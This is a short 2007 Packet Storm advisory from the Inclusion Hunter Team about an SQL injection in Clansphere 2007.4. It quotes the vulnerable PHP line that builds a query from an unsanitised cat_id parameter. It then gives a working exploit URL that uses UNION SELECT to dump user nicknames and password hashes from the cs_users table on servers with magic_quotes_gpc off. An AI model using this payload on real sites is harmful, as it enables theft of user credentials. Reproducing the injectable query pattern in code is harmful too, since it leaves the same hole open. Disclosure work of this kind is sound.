clansphere-sql.txt

2007-09-25T00:00:00
ID PACKETSTORM:59532
Type packetstorm
Reporter IHTeam
Modified 2007-09-25T00:00:00

Description

                                        
                                            `#########################################################################################  
#  
# Inclusion Hunter Team  
# http://www.ihteam.net  
#  
#  
# [Clansphere 2007.4]  
#  
#  
# Class: SQL Injection  
# Found: 22/09/2007  
# Remote: Yes  
# Site: http://www.clansphere.net/  
# Download: http://sourceforge.net/project/showfiles.php?group_id=95430  
#  
#########################################################################################  
  
  
Vulnerable code:  
mods/banners/navlist.php  
============================================================================================================  
if(!empty($_GET['cat_id'])) {  
$where = "categories_id = '" . $_GET['cat_id'] . "'";  
============================================================================================================  
  
  
  
  
Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):  
===================================================================================================================  
http://www.site.com/[path]/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,nu  
  
ll%20FROM%20cs_users/*  
===================================================================================================================  
  
  
Thanks To:  
=================================  
White_Sheep for his Bugs Hunter;  
=================================  
  
  
`